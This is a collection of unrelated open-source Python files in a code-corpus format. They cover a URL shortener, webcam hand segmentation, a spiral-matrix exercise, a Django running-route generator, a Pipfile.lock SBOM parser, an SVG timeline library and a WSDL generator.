def get_by_short_url(short_url: str) -> ShortenedUrl:
"""
Fetches the url record based on the provided shortened url.
:param short_url: shortened version of the URL to look for in the db
:return matching SQLAlchemy entity from the database
"""
assert short_url, short_url
return (db.session.connection
.query(ShortenedUrl)
.filter(ShortenedUrl.short_url == short_url)
.one())
@staticmethod
def get_by_long_url(long_url: str) -> ShortenedUrl:
"""
Fetches the url record based on the provided long/original url.
:param long_url: long version of the URL to look for in the db
:return matching SQLAlchemy entity from the database
"""
assert long_url, long_url
return (db.session.connection
.query(ShortenedUrl)
.filter(ShortenedUrl.long_url == long_url)
.one())
```
#### File: migrations/versions/a507aebc8a88_initial_schema.py
```python
from alembic import op
# revision identifiers, used by Alembic.
from sqlalchemy import Column, BigInteger, String, DateTime, func
revision = 'a507aebc8a88'
down_revision = None
branch_labels = None
depends_on = None
def upgrade():
op.create_table(
"url",
Column("id", BigInteger, primary_key=True),
Column("short_url", String, nullable=False),
Column("long_url", String, nullable=False),
Column("hits", BigInteger, nullable=False, default=0),
Column("created_at", DateTime(timezone=True), server_default=func.now()),
Column("updated_at", DateTime(timezone=True), onupdate=func.now()),
)
def downgrade():
op.drop_table("url")
``` |
{
"source": "Jocapear/computerVision",
"score": 3
} |
#### File: Jocapear/computerVision/test.py
```python
import numpy as np
import imutils
import cv2
bg = None
# --------------------------------------------------
# To find the running average over the background
# --------------------------------------------------
def run_avg(image, aWeight):
global bg
# initialize the background
if bg is None:
bg = image.copy().astype("float")
return
# compute weighted average, accumulate it and update the background
cv2.accumulateWeighted(image, bg, aWeight)
# ---------------------------------------------
# To segment the region of hand in the image
# ---------------------------------------------
def segment(image, threshold=25):
global bg
# find the absolute difference between background and current frame
diff = cv2.absdiff(bg.astype("uint8"), image)
# threshold the diff image so that we get the foreground
thresholded = cv2.threshold(
diff, threshold, 255, cv2.THRESH_BINARY+cv2.THRESH_OTSU)[1]
opening = cv2.morphologyEx(
thresholded, cv2.MORPH_OPEN, cv2.getStructuringElement(cv2.MORPH_RECT, (3, 3)))
# get the contours in the thresholded image
(cnts, _) = cv2.findContours(opening.copy(),
cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
# return None, if no contours detected
if len(cnts) == 0:
return
else:
# based on contour area, get the maximum contour which is the hand
segmented = max(cnts, key=cv2.contourArea)
return (opening, segmented)
# -----------------
# MAIN FUNCTION
# -----------------
if __name__ == "__main__":
# initialize weight for running average
aWeight = 0.5
# get the reference to the webcam
camera = cv2.VideoCapture(0)
# region of interest (ROI) coordinates
top, right, bottom, left = 0, 0, 700, 700
#top, right, bottom, left = 10, 350, 225, 590
# initialize num of frames
num_frames = 0
# keep looping, until interrupted
while(True):
# get the current frame
(grabbed, frame) = camera.read()
# resize the frame
frame = imutils.resize(frame, width=700)
# flip the frame so that it is not the mirror view
frame = cv2.flip(frame, 1)
# clone the frame
clone = frame.copy()
# get the height and width of the frame
(height, width) = frame.shape[:2]
# get the ROI
roi = frame[top:bottom, right:left]
# convert the roi to grayscale and blur it
gray = cv2.cvtColor(roi, cv2.COLOR_BGR2GRAY)
gray = cv2.GaussianBlur(gray, (7, 7), 0)
# to get the background, keep looking till a threshold is reached
# so that our running average model gets calibrated
if num_frames < 30:
run_avg(gray, aWeight)
else:
# segment the hand region
hand = segment(gray)
# check whether hand region is segmented
if hand is not None:
# if yes, unpack the thresholded image and
# segmented region
(thresholded, segmented) = hand
# Morphology operations
kernel = np.ones((7, 7), np.uint8)
thresholded = cv2.morphologyEx(
thresholded, cv2.MORPH_CLOSE, kernel)
# draw the segmented region and display the frame
cv2.drawContours(
clone, [segmented + (right, top)], -1, (0, 0, 255))
cv2.imshow("Thesholded", thresholded)
# draw the segmented hand
cv2.putText(clone, str(num_frames), (0, 25),
cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 0), 2)
cv2.rectangle(clone, (left, top), (right, bottom), (0, 255, 0), 2)
# increment the number of frames
num_frames += 1
# display the frame with segmented hand
cv2.imshow("Video Feed", clone)
# observe the keypress by the user
keypress = cv2.waitKey(1) & 0xFF
# if the user pressed "q", then stop looping
if keypress == ord("q"):
break
# free up memory
camera.release()
cv2.destroyAllWindows()
``` |
{
"source": "jocardozo/Rooftop-Challenge",
"score": 4
} |
#### File: Rooftop-Challenge/codeChallenge/Exercise1.py
```python
def makeFigure(size):
figure = [[0] *(size) for j in range(size)] #creamos la matriz de 0 en el tamaño pedido
x = 0
y = 0
figure[0][0] =1
'''Funciones auxiliares para el recorrido de la serpiente
'''
def moverEste(figure,x,y,pasos):
for i in range(pasos):
y = y + 1
x = x
figure[x][y] =1
return(x,y)
def moverSur(figure,x,y,pasos):
for i in range(pasos):
x = x + 1
y = y
figure[x][y] =1
return(x,y)
def moverOeste(figure,x,y,pasos):
for i in range(pasos):
y = y - 1
x = x
figure[x][y] =1
return(x,y)
def moverNorte(figure,x,y,pasos):
for i in range(pasos):
y = y
x = x - 1
figure[x][y] =1
return(x,y)
x,y = moverEste(figure,x,y,size-1) #Esta por fuera del patron, asi que 'definimos' como movimiento por defecto
d = "s"
'''Recorrido de la serpiente
'''
for i in range(1,size,1):
if (d == "s"):
x,y = moverSur(figure,x,y,size-i)
d = "o"
continue
if (d == "o"):
x,y = moverOeste(figure,x,y,size-i+1)
d = "n"
continue
if (d == "n"):
x,y = moverNorte(figure,x,y,size-i)
d = "e"
continue
if (d == "e"):
x,y = moverEste(figure,x,y,size-i+1)
d = "s"
continue
return(figure)
``` |
{
"source": "jocarino/Runnify",
"score": 3
} |
#### File: Runnify/pages/openstreetmaps.py
```python
from math import pi
#circular coords libraries
from functools import partial
import pyproj
from shapely.ops import transform
from shapely.geometry import Point
#open route service libraries
import openrouteservice
from openrouteservice import convert
#map plotting
#import numpy as np
import math
#import pandas as pd
import matplotlib.pyplot as plt
#ables python to get current location
import geocoder
# %%
#################################
###########FRONT END#############
#################################
'''
class FrontEndRequest(object):
def __init__(self, lat, lng, original_run):
self.lat = lat
self.lng = lng
self.original_run = original_run
#getting current location
g = geocoder.ip('me')
lat = g.lat
lng = g.lng
#Requested running distance
original_run = 20
#creat request object
front_end_request = FrontEndRequest(lat, lng, original_run)
'''
#%%
#################################
########### TESTING #############
#################################
# #Plots circular generated coordinates in a map image
# plot_option = False
# #Prints out delta for optimization (finding the accurate total distance)
# print_delta = True
# #Prints in case the API fucksup
# api_check = False
#%%
#################################
###########FUNCTIONS#############
#################################
# generates list with coordinate pairs in tuples, from the center
def geodesic_point_buffer(front_end_request, radius, angle = pi/2):
"""
Parameters
----------
lat : float
Lattitude of the coordinate.
lon : flat
Longitude of the coordinate.
radius : float
Radius of the route.
Returns
-------
TYPE
list of the coords as tuples [(lat, lng), ..., (lat, lng)]
"""
#correcting for the lng and lat side orientation
angle += pi/2
#Performs cartographic transformations. Converts from longitude, latitude to native map projection x,y coordinates and vice versa using PROJ
proj_wgs84 = pyproj.Proj('+proj=longlat +datum=WGS84')
#radius is in km
# Azimuthal equidistant projection
aeqd_proj = '+proj=aeqd +lat_0={lat} +lon_0={lon} +x_0=0 +y_0=0'
project = partial(
pyproj.transform,
pyproj.Proj(aeqd_proj.format(lat=front_end_request.lat, lon=front_end_request.lng)),
proj_wgs84)
#on Point(lat,lng) higher the buffer on lat - the higher the lat, same for lng
#multiplying the lat or lng inside the Point() with 1000*radius, makes the point go to one of the edges
#buf = Point(radius* math.cos(angle), radius * math.sin(angle)).buffer(radius * 1000) # distance in metres
buf = Point(radius * 1000 * math.cos(angle), radius * 1000 * math.sin(angle)).buffer(radius * 1000) # distance in metres
return transform(project, buf).exterior.coords[:]
#just to separate lat and long
def plotting_coords_in_map(front_end_request, map_file, coords):
"""
Parameters
----------
map_file : string
It's the file path to the map image.
c : list
list of the coords as tuples [(lat, lng), ..., (lat, lng)].
Returns
-------
None. Just plots
"""
lat_list = []
lng_list = []
for c in coords:
lat_list.append(c[0])
lng_list.append(c[1])
#define bouding box of the map
bounding_box = (min(lng_list), max(lng_list), min(lat_list), max(lat_list))
#load map image
map_image = plt.imread(map_file)
fig, ax = plt.subplots(figsize = (8,7))
ax.scatter(lng_list, lat_list, zorder=1, alpha=0.7, c='r', s=50)
ax.scatter(front_end_request.lat, front_end_request.lng, zorder=2, alpha=0.7, c='b', s=500)
ax.set_title('Plotting the route')
ax.set_xlim(bounding_box[0], bounding_box[1],bounding_box[2], bounding_box[3])
ax.imshow(map_image, zorder=0, extent=bounding_box, aspect='auto')
class Route(object):
def __init__(self, route_json):
self.route = route_json
self.distance = route_json['routes'][0]['summary']['distance']
def getting_route(front_end_request, run, angle = pi/2, plot_option = False):
"""
Parameters
----------
front_end_request : FrontEndRequest
Object with the info requested from the front end.
run : float
Running distance requested by the user.
Returns
-------
Route
a route object
"""
radius = run/(2*pi)
#2pi*r = P <=> r = P/2*pi
#generate the coords
#coords = geodesic_point_buffer(lat, lon, radius)
coords = geodesic_point_buffer(front_end_request, radius, angle)
#turn coords in list in order to reduce to half
#coords = []
# for c in b:
# c1 = c[0]
# c2 = c[1]
# cf = (c1, c2)
# coords.append(cf)
#reduce to half, api only accepts 50 data points
while len(coords) > 50:
coords = coords[::2]
#for testing
if plot_option:
plotting_coords_in_map(front_end_request, 'map.png', coords)
print("map ploted")
#python openstreetmaps.py
#API key
client = openrouteservice.Client(key='<KEY>')
#coords = ((8.34234,48.23424),(8.34423,48.26424), (8.34523,48.24424), (8.41423,48.21424))
#api needs coords in tupple
coords_b = tuple(coords)
#get the full route
route_json = client.directions(coords_b, profile='cycling-regular', optimize_waypoints=False)
route = Route(route_json)
return route
def relative_error(total_distance, original_run):
"""
Parameters
----------
total_distance : float
distance of the route generated by the API
original_run : float
target distance given by the user
Returns
-------
float
relative error to the target distance
"""
return (total_distance - original_run*1000)/(original_run*1000)
def closer_to_target(prev_option, route, original_run):
"""
Parameters
----------
prev_option : tuple (routes json, distance float)
previous distance.
routes : json object
routes json related to the current closest option.
distance : float
current calculated distance.
original_run : float
current target distance for the run.
Returns
-------
(routes, distance) : tuple (routes json, distance float)
closest tuple to the distance run
"""
prev_distance = prev_option.distance
prev_distance_error = abs(original_run - prev_distance)
distance_error = abs(original_run - route.distance)
#check the lowest error to the target
if prev_distance_error < distance_error:
return prev_option
return route
#%%
#################################
###### MAIN ###########
#################################
def main_as_function(front_end_request, print_delta = False, plot_option = False, api_check = False):
"""
Parameters
----------
lat : float
current latitude.
lon : float
current longitude.
original_run : float
target distance, user input from front end.
print_delta : bool, optional
testing optimization. The default is False.
plot_option : book, optional
plots the generated coordinates. The default is False.
api_check : bool, optional
prints in case the api does not work. The default is False.
Returns
-------
decoded_options : json object
decoded coordinates, separated by angles {angle: coordinates}.
"""
#tuning the distance due to mapping
run = front_end_request.original_run/3
#angles = [0, pi/2, pi, 3/4*pi]
angles = [0]
angles_degrees = ['0', '90', '180', '270']
#storing the different possibilities in tuples (routes and distance)
routing_options = []
#storing the decoded coords for each option
decoded_options = {}
for (n, angle) in enumerate(angles):
#100m of error on the total route
precision = 100
learning_rate = 1
route = getting_route(front_end_request, run, angle, plot_option)
lowest_option = route
delta = relative_error(route.distance, front_end_request.original_run)
#limit api requests
count = 0
#optimization
while count < 5:
#check target compliance
if abs(route.distance - front_end_request.original_run*1000) < precision:
routing_options.append(lowest_option)
break
else:
#store last value of run
run_prev = run
delta_prev = delta
#relative error for optimization reference
delta = relative_error(route.distance, front_end_request.original_run)
run = run_prev - learning_rate*delta
#in case delta changes to negative or vice-versa
if (delta*delta_prev > 0 and delta < 0) or (delta*delta_prev < 0 and delta > 0):
learning_rate = .2
#in case the API fucks up somehow
try:
#get a new distance value
route = getting_route(front_end_request, run)
except:
#for testing
if api_check:
print("API fuckup")
routing_options.append(lowest_option)
break
#store the info closest to target distance
lowest_option = closer_to_target(lowest_option, route, front_end_request.original_run)
#for testing
if print_delta:
print('Delta = ', delta,', learning Rate = ', learning_rate)
if route.distance < (front_end_request.original_run*1000 - precision):
print('Lower', route.distance)
elif route.distance > (front_end_request.original_run*1000 + precision):
print('Greater', route.distance)
#upp the counter
count += 1
#for testing
if print_delta:
print('Done', lowest_option.distance)
# get the geometry from the routes and decode_polyline needs the geometry only
geometry = lowest_option.route['routes'][0]['geometry']
decoded = convert.decode_polyline(geometry)
#prepare the json object with the angles and the coordinates
decoded_options[angles_degrees[n]] = decoded["coordinates"]
return decoded_options
#decoded_options = main_as_function(front_end_request, print_delta=True)
""" routes = client.directions(coords, profile='cycling-regular', optimize_waypoints=True)
openrouteservice.directions.directions(client, coordinates, profile='driving-car', format_out=None, format='json', preference=None, units=None, language=None, geometry=None, geometry_simplify=None, instructions=None, instructions_format=None, alternative_routes=None, roundabout_exits=None, attributes=None, maneuvers=None, radiuses=None, bearings=None, skip_segments=None, continue_straight=None, elevation=None, extra_info=None, suppress_warnings=None, optimized=None, optimize_waypoints=None, options=None, validate=True, dry_run=None)
profile (string) – Specifies the mode of transport to use when calculating directions. One of [“driving-car”, “driving-hgv”, “foot-walking”, “foot-hiking”, “cycling-regular”, “cycling-road”,”cycling-mountain”, “cycling-electric”,]. Default “driving-car”.
elevation (boolean) – Specifies whether to return elevation values for points. Default False.
extra_info (list or tuple of strings) – Returns additional information on [“steepness”, “suitability”, “surface”, “waycategory”, “waytype”, “tollways”, “traildifficulty”, “roadaccessrestrictions”]. Must be a list of strings. Default None.
"""
```
#### File: Runnify/pages/views.py
```python
from django.views.generic import TemplateView
from django.views.generic.edit import CreateView
from django.contrib.auth.forms import UserCreationForm
from django.shortcuts import render, redirect
import json
from .models import Coordinates, RouteRequest
from .openstreetmaps import main_as_function
#from django.contrib.gis.utils import GeoIP
#from django.contrib.gis.geoip2 import GeoIP2
import geocoder
from django.forms import modelform_factory
from .forms import RouteRequestForm
from django.conf import settings
from django.utils.http import is_safe_url
from django.http import HttpResponse, Http404, JsonResponse
ALLOWED_HOSTS = settings.ALLOWED_HOSTS
Coordinates = Coordinates()
def SaveCoordinatesToDB(list_of_coordinates):
Coordinates.coordinates = json.dumps(list_of_coordinates)
Coordinates.save()
#object for generation route
class routeRequestClass(object):
def __init__(self, coords, original_run):
self.lat = coords[0]
self.lng = coords[1]
self.original_run = original_run
def HomePageView(request):
form = RouteRequestForm()
return render(
request,
'pages/home.html',
context={},
status=200,
)
def get_route(request):
form = RouteRequestForm(request.POST or None)
next_url = request.POST.get("route") or None
if form.is_valid():
obj = form.save(commit=False)
#get the info from the frontend
running_distance = form.cleaned_data['running_distance']
user_location_info = form.cleaned_data['user_location']
obj.user_location = user_location_info
#generate the route
user_location = user_location_info.split(',')
route_request = routeRequestClass(user_location, running_distance)
route_json = main_as_function(route_request,print_delta=True)
list_of_coordinates = route_json['0']
# Save form object
#obj.save()
route = RouteRequest(running_distance= running_distance,
user_location= str(user_location_info))
if request.is_ajax():
return JsonResponse({"coordinates": list_of_coordinates}, status=201) # 201 == created items
if next_url != None and is_safe_url(next_url, ALLOWED_HOSTS):
return redirect(next_url)
return render(
request,
'pages/home.html',
context={'form':form,
'coordinates':list_of_coordinates}
)
class AboutPageView(TemplateView):
template_name = 'pages/about.html'
'''
def validate_username(request):
username = request.GET.get('username', None)
data = {
'is_taken': User.objects.filter(username__iexact=username).exists()
}
return JsonResponse(data)
class SignUpView(CreateView):
template_name = 'core/signup.html'
form_class = UserCreationForm
'''
``` |
{
"source": "jocassid/cyclonedx-python",
"score": 2
} |
#### File: cyclonedx_py/parser/pipenv.py
```python
import json
from typing import Any, Dict
from cyclonedx.model import ExternalReference, ExternalReferenceType, HashType
from cyclonedx.model.component import Component
from cyclonedx.parser import BaseParser
# See https://github.com/package-url/packageurl-python/issues/65
from packageurl import PackageURL # type: ignore
class PipEnvParser(BaseParser):
def __init__(self, pipenv_contents: str) -> None:
super().__init__()
pipfile_lock_contents = json.loads(pipenv_contents)
pipfile_default: Dict[str, Dict[str, Any]] = pipfile_lock_contents.get('default') or {}
for (package_name, package_data) in pipfile_default.items():
c = Component(
name=package_name,
version=str(package_data.get('version') or 'unknown').lstrip('='),
purl=PackageURL(
type='pypi', name=package_name, version=str(package_data.get('version') or 'unknown').lstrip('=')
)
)
if package_data.get('index') == 'pypi' and isinstance(package_data.get('hashes'), list):
# Add download location with hashes stored in Pipfile.lock
for pip_hash in package_data['hashes']:
ext_ref = ExternalReference(
reference_type=ExternalReferenceType.DISTRIBUTION,
url=c.get_pypi_url(),
comment='Distribution available from pypi.org'
)
ext_ref.add_hash(HashType.from_composite_str(pip_hash))
c.add_external_reference(ext_ref)
self._components.append(c)
class PipEnvFileParser(PipEnvParser):
def __init__(self, pipenv_lock_filename: str) -> None:
with open(pipenv_lock_filename) as r:
super(PipEnvFileParser, self).__init__(pipenv_contents=r.read())
``` |
{
"source": "jocassid/pysvgi",
"score": 3
} |
#### File: jocassid/pysvgi/CyclicTimeline.py
```python
from collections import namedtuple
from datetime import datetime, timedelta
from math import ceil
from dom import Document
from pysvgi import Circle, Line, Svg, Text
class DatetimeUtil:
"""Adds some additional methods to the standard datetime class"""
# tuple as generated by datetime.timetuple:
#
# time.struct_time(
# tm_year=2017,
# tm_mon=9,
# tm_mday=17,
# tm_hour=0,
# tm_min=37,
# tm_sec=30,
# tm_wday=6,
# tm_yday=260,
# tm_isdst=-1)
ResolutionData = namedtuple(
'ResolutionData',
['mask', 'timedelta_args'])
RESOLUTIONS = {
'hour': ResolutionData(
(1, 1, 1, 1, 0, 0, 0),
{'seconds': 60 * 60})
}
@staticmethod
def round_down(datetime_in, resolution):
if resolution not in DatetimeUtil.RESOLUTIONS:
raise ValueError("Invalid resolution %s" % resolution)
mask = DatetimeUtil.RESOLUTIONS[resolution].mask
dateTuple = datetime_in.timetuple()[:7]
args = [a * b for a, b in zip(dateTuple, mask)]
return datetime(*args)
@staticmethod
def round_up(datetime_in, resolution):
rounded_datetime = DatetimeUtil.round_down(datetime_in, resolution)
timedelta_args = DatetimeUtil.RESOLUTIONS[resolution].timedelta_args
return rounded_datetime + timedelta(**timedelta_args)
class Event:
DATE_FORMAT = '%Y-%m-%d %H:%M:%S'
def __init__(self, startTime):
self.startTime = startTime
self.x = None
self.y = None
def onRow(self, row):
return row.startTime <= self.startTime < row.nextRowStartTime
def __repr__(self):
return '<Event %s>' % self.startTime.strftime(self.DATE_FORMAT)
def __eq__(self, rhs):
if rhs is None:
return False
if type(rhs) != type(self):
return False
return self.startTime == rhs.startTime
def layout(self, row):
self.x = row.datetimeToX(self.startTime)
self.y = row.baseY
def render(self):
print('rendering event')
return [Circle(5, self.x, self.y)]
class EventSpan(Event):
def __init__(self, startTime, endTime):
super().__init__(startTime)
self.endTime = endTime
def split(self, splitTime, resolutionTimedelta):
if not (self.startTime < splitTime < self.endTime):
return self, None
remainderEvent = EventSpan(splitTime, self.endTime)
self.endTime = splitTime - resolutionTimedelta
return self, remainderEvent
def __repr__(self):
return '<EventSpan %s - %s>' % \
(self.startTime.strftime(self.DATE_FORMAT),
self.endTime.strftime(self.DATE_FORMAT))
class EventSeries(list):
def __init__(self, name, color, iterable=None):
if iterable is None:
super().__init__()
else:
super().__init__(iterable)
self.name = name
self.color = color
def append(self, event):
event.color = self.color
super().append(event)
def sort(self):
super().sort(key=lambda i: i.startTime)
def getEventsOnRow(self, row, resolutionTimedelta):
eventsOut = []
remnants = []
for event in self:
if not event.onRow(row):
continue
# if isinstance(event, EventSpan):
# event, remnant = event.split(
# row.nextRowStartTime,
# resolutionTimedelta)
# remnants.append(remnant)
eventsOut.append(event)
for remnant in remnants:
self.insert(0, remnant)
return eventsOut
class Row:
def __init__(
self,
startTime,
nextRowStartTime,
minX,
maxX,
baseY):
self.startTime = startTime
self.nextRowStartTime = nextRowStartTime
self.minX = minX
self.maxX = maxX
self.baseY = baseY
self.recalculate()
def recalculate(self):
self.width = self.maxX - self.minX
self.startTimestamp = self.startTime.timestamp()
self.timeSpan = self.nextRowStartTime.timestamp() - self.startTimestamp
def datetimeToX(self, datetimeIn):
timeSinceStart = datettimeIn.timestamp() - self.startTimestamp
temp = (timeSinceStart / self.timeSpan) * self.width
return self.minX + int(temp)
class CyclicTimeline(Svg):
MARGIN_TOP = 50
MARGIN_BOTTOM = 50
MARGIN_LEFT = 50
MARGIN_RIGHT = 50
SPACE_FOR_DATE = 100
LINE_LENGTH = 300
RESOLUTION_TIMEDELTA = timedelta(seconds=60)
CycleConfiguration = namedtuple(
'CycleConfiguration',
[
'timedeltaArgs',
'dateFormat'
])
CYCLE_LENGTHS = {
'hour': CycleConfiguration(
{'seconds': 3600},
'%H:%M'),
'day': CycleConfiguration(
{'days': 1},
'%Y-%m-%d'),
'week': CycleConfiguration(
{'days': 7},
'%Y-%m-%d'),
'month': None,
'year': CycleConfiguration(
{'days': 365.25},
'%Y')
}
ROW_HEIGHT = 30
def __init__(
self,
startDate,
endDate,
cycleLength='hour',
dateFormat=None):
super().__init__()
self.startDate = DatetimeUtil.round_down(startDate, cycleLength)
self.endDate = DatetimeUtil.round_up(endDate, cycleLength)
self.config = self.CYCLE_LENGTHS.get(cycleLength, None)
if self.config is None:
raise ValueError("Invalid cycleLength %s" % self.cycleLength)
self.cycleLength = cycleLength
if dateFormat is None:
self.dateFormat = self.config.dateFormat
else:
self.dateFormat = dateFormat
self.allEventSeries = []
self.rowStartTimes = {}
def getRowCount(self, span):
if self.cycleLength == 'hour':
return ceil(span.total_seconds() / 60.0 / 60.0)
raise ValueError('%s cycleLength not implemented' % self.cycleLength)
def getRowStartTime(self, rowIndex):
# Note: I'm using integer keys into a dict
if rowIndex in self.rowStartTimes:
return self.rowStartTimes[rowIndex]
timedeltaArgs = self.config.timedeltaArgs
timedeltaArgs = {
k: v * rowIndex for k, v in list(timedeltaArgs.items())
}
startTime = self.startDate + timedelta(**timedeltaArgs)
self.rowStartTimes[rowIndex] = startTime
twoBack = rowIndex - 2
if twoBack in self.rowStartTimes:
self.rowStartTimes.pop(twoBack)
return startTime
def sortEvents(self):
for eventSeries in self.allEventSeries:
eventSeries.sort()
def getEventsOnThisRow(self, row):
eventsOut = []
for eventSeries in self.allEventSeries:
eventsOut += eventSeries.getEventsOnRow(
row,
self.RESOLUTION_TIMEDELTA)
eventsOut.sort()
return eventsOut
def layoutEvents(self, rowEvents, row):
placedEvents = []
maxY = row.baseY
for i, event in enumerate(rowEvents):
event.layout(row)
return maxY
def renderCycleLine(self, y, rowStartTime, lineMinX, lineMaxX):
text = Text(
rowStartTime.strftime(self.dateFormat),
self.MARGIN_LEFT,
y,
text_anchor='start')
self.append(text)
line = Line(lineMinX, y, lineMaxX, y)
self.append(line)
def renderEvents(self):
for eventSeries in self.allEventSeries:
for event in eventSeries:
for element in event.render():
self.append(element)
def build(self):
span = self.endDate - self.startDate
print('timelineSpan', span)
rows = self.getRowCount(span)
self.sortEvents()
y = self.MARGIN_TOP
lineMinX = self.MARGIN_LEFT + self.SPACE_FOR_DATE
lineMaxX = self.MARGIN_LEFT + self.SPACE_FOR_DATE + self.LINE_LENGTH
for i in range(rows):
rowStartTime = self.getRowStartTime(i)
nextRowStartTime = self.getRowStartTime(i)
row = Row(
rowStartTime,
nextRowStartTime,
lineMinX,
lineMaxX,
y)
rowEvents = self.getEventsOnThisRow(row)
y = self.layoutEvents(
rowEvents,
row)
self.renderCycleLine(y, rowStartTime, lineMinX, lineMaxX)
self.renderEvents()
y += 20
self.height = y + self.MARGIN_BOTTOM
self.width = self.MARGIN_LEFT + self.SPACE_FOR_DATE + \
self.LINE_LENGTH + self.MARGIN_RIGHT
def toprettyxml(self, indent='\t', newl='\n', encoding=''):
self.build()
return super().toprettyxml(indent, newl, encoding)
def __str__(self):
return super().__str__()
if __name__ == '__main__':
timeline = CyclicTimeline(
datetime(2017, 9, 10, 9),
datetime(2017, 9, 10, 17),
'hour',
'%I:%M %p')
series1 = EventSeries('series1', 'green')
series1.append(Event(datetime(2017, 9, 10, 9, 30)))
series1.append(
EventSpan(
datetime(2017, 9, 10, 9, 40),
datetime(2017, 9, 10, 9, 50)))
timeline.allEventSeries = [series1]
with open('timeline.svg', 'w') as outFile:
outFile.write(Document.XML_LINE + '\n')
outFile.write(timeline.toprettyxml())
```
#### File: jocassid/pysvgi/test_pysvgi.py
```python
from unittest import TestCase
from pysvgi import Svg
class SvgTest(TestCase):
def test_init(self):
svg = Svg()
self.assertEqual("1.1", svg['version'])
self.assertEqual("full", svg['baseProfile'])
self.assertEqual("http://www.w3.org/2000/svg", svg['xmlns'])
def test_width(self):
svg = Svg()
svg.width = 200
self.assertEqual(200, svg.attributes['width'])
self.assertEqual(200, svg.width)
def test_height(self):
svg = Svg()
svg.height = 300
self.assertEqual(300, svg.attributes['height'])
self.assertEqual(300, svg.height)
```
#### File: jocassid/pysvgi/tryPysvgi.py
```python
from pysvgi import Svg, Rect, Circle, Text
def basic_svg_sample():
svg = Svg(300, 200)
rect = Rect('100%', '100%', fill="red")
circle = Circle(80, 150, 100, fill="green")
text = Text('SVG', x="150", y="125", font_size="60", text_anchor="middle",
fill="white")
svg.append(rect)
svg.append(circle)
svg.append(text)
print(svg.document())
def try_viewBox():
#svg = Svg(200, 200, viewBox="0 0 100 100")
svg = Svg(200, 200, viewBox="0 0 100 100")
svg.append(Circle(50, 50, 50, fill='red'))
svg.append(Circle(50, 50, 150, fill='blue'))
svg.append(Circle(50, 150, 50, fill='green'))
svg.append(Circle(50, 150, 150, fill='yellow'))
print('''<?xml version='1.0' encoding='utf-8'?>
<html>
<style>
body{ background: black }
svg{ border: solid white 1px }
</style>
<body>''')
print(svg)
print('''</body>
</html>''')
def main():
try_viewBox()
if __name__ == '__main__':
main()
``` |
{
"source": "jocassid/soapfish",
"score": 2
} |
#### File: soapfish/soapfish/py2wsdl.py
```python
from __future__ import absolute_import, print_function
import argparse
import imp
import logging
import sys
import six
from lxml import etree
from . import namespaces as ns, xsd
from .py2xsd import generate_xsdspec
from .soap import SOAP_HTTP_Transport
from .utils import uncapitalize
from .wsdl import get_wsdl_classes
logger = logging.getLogger('soapfish')
# --- Helpers -----------------------------------------------------------------
def build_service(wsdl, definitions, service):
wsdl_port = wsdl.Port()
wsdl_port.name = service.name + 'Port'
wsdl_port.binding = 'tns:' + service.name + 'Binding'
wsdl_port.address = wsdl.SOAP_Address(location=service.location)
wsdl_service = wsdl.Service()
wsdl_service.name = service.name
wsdl_service.ports.append(wsdl_port)
definitions.services.append(wsdl_service)
def build_bindings(wsdl, definitions, service):
binding = wsdl.Binding()
binding.name = service.name + 'Binding'
binding.type = 'tns:' + service.name + 'PortType'
binding.binding = wsdl.SOAP_Binding()
binding.binding.style = 'document'
binding.binding.transport = SOAP_HTTP_Transport
for method in service.methods:
operation = wsdl.Operation()
operation.name = method.operationName
operation.operation = wsdl.SOAP_Operation()
operation.operation.soapAction = method.soapAction
operation.input = wsdl.Input(body=wsdl.SOAP_Body(use='literal'))
operation.output = wsdl.Output(body=wsdl.SOAP_Body(use='literal'))
operation.operation.style = method.style
binding.operations.append(operation)
definitions.bindings.append(binding)
def build_portTypes(wsdl, definitions, service):
portType = wsdl.PortType()
portType.name = service.name + 'PortType'
for method in service.methods:
operation = wsdl.Operation()
operation.name = method.operationName
operation.input = wsdl.Input(message='tns:' + method.operationName + 'Input')
operation.output = wsdl.Output(message='tns:' + method.operationName + 'Output')
portType.operations.append(operation)
definitions.portTypes.append(portType)
def build_messages(wsdl, definitions, service):
for method in service.methods:
inputMessage = wsdl.Message(name=method.operationName + 'Input')
part = wsdl.Part(name='body')
if isinstance(method.input, six.string_types):
part.element = 'sns:' + method.input
else:
part.type = 'sns:' + uncapitalize(method.input.__name__)
inputMessage.parts = [part]
definitions.messages.append(inputMessage)
outputMessage = wsdl.Message(name=method.operationName + 'Output')
part = wsdl.Part(name='body')
if isinstance(method.output, six.string_types):
part.element = 'sns:' + method.output
else:
part.type = 'sns:' + uncapitalize(method.output.__name__)
outputMessage.parts = [part]
definitions.messages.append(outputMessage)
def build_types(wsdl, definitions, service):
schemas = [generate_xsdspec(schema) for schema in service.schemas]
definitions.types = wsdl.Types(schemas=schemas)
def generate_wsdl(service):
wsdl = get_wsdl_classes(service.version.BINDING_NAMESPACE)
definitions = wsdl.Definitions(targetNamespace=service.targetNamespace)
build_types(wsdl, definitions, service)
build_service(wsdl, definitions, service)
build_bindings(wsdl, definitions, service)
build_portTypes(wsdl, definitions, service)
build_messages(wsdl, definitions, service)
xmlelement = etree.Element(
'{%s}definitions' % ns.wsdl,
nsmap={
# FIXME: Look up properly if multiple schemas...
'sns': service.schemas[0].targetNamespace,
'soap': service.version.BINDING_NAMESPACE,
'tns': service.targetNamespace,
'wsdl': ns.wsdl,
'xsd': ns.xsd,
},
)
definitions.render(xmlelement,
definitions,
namespace=ns.wsdl,
elementFormDefault=xsd.ElementFormDefault.QUALIFIED)
return xmlelement
# --- Program -----------------------------------------------------------------
def main(argv=None):
stdout = getattr(sys.stdout, 'buffer', sys.stdout)
parser = argparse.ArgumentParser(
formatter_class=argparse.RawDescriptionHelpFormatter,
description='Generates a WSDL document from a Python module.',
)
parser.add_argument('module', help='The path to a python module.')
parser.add_argument('output', help='Output path for WSDL document.',
nargs='?', type=argparse.FileType('wb'), default=stdout)
opt = parser.parse_args(sys.argv[1:] if argv is None else argv)
logger.info('Generating WSDL for Python module: %s' % opt.module)
module = imp.load_source('', opt.module)
tree = generate_wsdl(getattr(module, 'SERVICE'))
opt.output.write(etree.tostring(tree, pretty_print=True))
return 0
if __name__ == '__main__':
sys.exit(main())
```
#### File: soapfish/soapfish/soap.py
```python
from __future__ import absolute_import
import logging
import string
import requests
import six
from . import core, namespaces as ns, soap11, soap12, wsa
from .utils import uncapitalize
SOAP_HTTP_Transport = ns.wsdl_soap_http
logger = logging.getLogger('soapfish')
class SOAPVersion:
SOAP12 = soap12
